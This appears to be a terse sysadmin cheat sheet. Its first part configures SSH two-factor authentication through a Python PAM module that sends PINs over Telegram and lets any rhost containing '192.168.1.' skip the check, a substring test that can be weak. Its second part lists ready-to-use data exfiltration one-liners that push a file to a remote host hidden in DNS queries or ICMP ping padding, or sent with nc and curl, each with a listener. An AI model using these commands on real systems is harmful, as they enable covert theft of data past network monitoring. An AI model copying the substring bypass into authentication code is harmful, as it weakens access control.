# SSH two-factor authentication (pam + telegram)


# apt-get install libpam-python

# grep -m 1 ChallengeResponseAuthentication /etc/ssh/sshd_config
ChallengeResponseAuthentication yes

# cat /etc/pam.d/sshd | grep -B 1 -A 1 authentication
auth requisite /lib/security/pam_python.so /lib/security/telegramPIN.py
# Standard Un*x authentication.
@include common-auth

# cat /lib/security/telegramPIN.py
import base64
import random
import subprocess

def pam_sm_authenticate(pamh, flags, argv):
  local_network = '192.168.1.'
  if local_network in pamh.rhost:
      return pamh.PAM_SUCCESS
  else:
    try:
      user = pamh.get_user(None)
    except pamh.exception, e:
      return e.pam_result
    r = random.SystemRandom()
    pin = ''.join([str(r.randint(0, 9)) for i in xrange(0,8)])
    b64 = base64.b64encode('SSH-PIN = ' + pin)
    subprocess.Popen(['/send_telegram_msg.py', b64])
    msg = pamh.Message(pamh.PAM_PROMPT_ECHO_OFF, 'PIN: ')
    rsp = pamh.conversation(msg)
    if rsp.resp == pin:
      return pamh.PAM_SUCCESS
    return pamh.PAM_AUTH_ERR

def pam_sm_setcred(pamh, flags, argv):
  return pamh.PAM_SUCCESS

def pam_sm_acct_mgmt(pamh, flags, argv):
  return pamh.PAM_SUCCESS

def pam_sm_open_session(pamh, flags, argv):
  return pamh.PAM_SUCCESS

def pam_sm_close_session(pamh, flags, argv):
  return pamh.PAM_SUCCESS

def pam_sm_chauthtok(pamh, flags, argv):
  return pamh.PAM_SUCCESS

# service ssh restart

References

http://pam-python.sourceforge.net/doc/html/
http://www.linux-pam.org/Linux-PAM-html/Linux-PAM_MWG.html

# Covert channels for data exfiltration


DNS

local# xxd -p -c 16 $file | while read line; do dig @$remote $line. +time=1 +retry=0 & done
remote# tcpdump -ni any -Xs 0 "host $remote and udp dst port 53"

ICMP

local# xxd -p -c 32 $file | while read line; do ping -p $line -c 1 $remote; done
remote# tcpdump -ni any -Xs 0 'host $remote icmp'

Raw

local# nc $remote $port < $file
remote# nc -l -p $port

HTTP/S

local# curl --data "@$file" http://$remote:$port
local# curl --data "param=`cat $file`" http://$remote:$port
local# curl --header "header=`cat $file`" http://$remote:$port
remote# nc -l -p $port